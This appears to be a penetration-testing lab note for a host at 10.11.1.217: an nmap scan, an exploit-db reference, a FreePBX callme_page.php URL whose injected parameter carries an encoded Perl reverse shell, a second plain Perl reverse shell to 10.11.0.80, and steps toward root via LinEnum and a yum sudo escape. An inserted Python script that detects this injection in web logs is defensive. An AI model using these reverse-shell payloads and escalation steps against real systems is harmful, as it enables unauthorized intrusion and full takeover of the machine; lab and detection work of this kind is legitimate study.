Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-03 13:12 CST
Nmap scan report for 10.11.1.217
Host is up (0.29s latency).
Not shown: 987 closed ports, 2 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
143/tcp  open  imap
443/tcp  open  https
993/tcp  open  imaps
995/tcp  open  pop3s
3306/tcp open  mysql
4445/tcp open  upnotifyp
MAC Address: 00:50:56:89:1E:E1 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.51 seconds

https://www.exploit-db.com/exploits/18650

https://10.11.1.217/recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.11.0.80%3a443%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A
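The request above carries URL-encoded CR/LF (%0D%0A) in the callmenum parameter, followed by Application: and Data: lines. As an added defender-side example (not part of the original notes), this check flags such requests in a web access log; the combined log format, the function names and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (not from the page); the command is a placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/May/2019:13:20:01 +0800] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000 HTTP/1.1" 200 512',
    '10.0.0.9 - - [03/May/2019:13:21:44 +0800] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20PLACEHOLDER%0D%0A%0D%0A HTTP/1.1" 200 498',
    '10.0.0.9 - - [03/May/2019:13:22:10 +0800] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000%250d%250aApplication:%2520system HTTP/1.1" 200 498',
    '10.0.0.7 - - [03/May/2019:13:23:00 +0800] "GET /index.php?callmenum=42 HTTP/1.1" 200 1024',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Header names taken from the request shown on the page.
HEADER_RE = re.compile(r"(?im)^\s*(application|data)\s*:")

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded CR/LF is also exposed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return (client, reasons) for a suspicious callme_page.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.endswith("callme_page.php"):
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("callmenum", []):
        value = fully_decode(raw)
        reasons = []
        if "\r" in value or "\n" in value:
            reasons.append("CR/LF in callmenum")
        if HEADER_RE.search(value):
            reasons.append("header-style line after line break")
        if reasons:
            return client, reasons
    return None

def scan(lines):
    """Return (line_index, client, reasons) for each flagged line."""
    return [(i, *hit) for i, line in enumerate(lines) if (hit := inspect_line(line))]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A legitimate callmenum value is a dial string, so any decoded line break in it is worth alerting on even without the header match.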

perl -e 'use Socket;$i="10.11.0.80";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Not a root shell yet.

Run LinEnum.sh.

Use yum to get a root shell:

https://gtfobins.github.io/gtfobins/yum/#sudo